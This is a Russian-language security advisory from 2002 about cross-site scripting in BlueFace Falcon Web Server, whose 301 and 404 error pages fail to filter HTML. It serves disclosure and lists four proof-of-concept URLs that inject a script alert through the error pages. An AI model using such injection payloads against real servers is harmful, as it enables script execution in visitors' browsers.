Межсайтовый скриптинг в Falcon Web Server

Дата публикации:
12.08.2002
Всего просмотров:
683
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Falcon Web Server (http://www.blueface.com/products.html)– Web сервер с поддержкой ISAPI и WinCGI для Microsoft Windows.

Falcon Webserver не фильтрует HTML тэги в страницах ошибки. В частности, атакующий может внедрить HTML код в 301 и 404 страницы ошибки. Пример:

  1. 301 Message XSS
    Closing TITLE tag: 
    http://localhost/%3c/title%3e%3cscript%3e
    alert(%22xss%22)%3c/script%3e 
    Closing A HREF: 
    http://localhost/%22%3cscript%3e
    alert(%22xss%22)%3c/script%3e 
    Closing A tag: 
    http://localhost/%3c/a%3e%3cscript%3e
    alert(%22xss%22)%3c/script%3e
    
  2. 404 Message XSS
    http://localhost/%3cscript%3ealert(%22xss%22)%3c/script%3e/
    
уязвимость обнаружена в BlueFace Falcon Web Server 2.0.0.1009- 2.0.0.1021

Ссылки: Cross-Site Scripting Issues in Falcon Web Server
или введите имя

CAPTCHA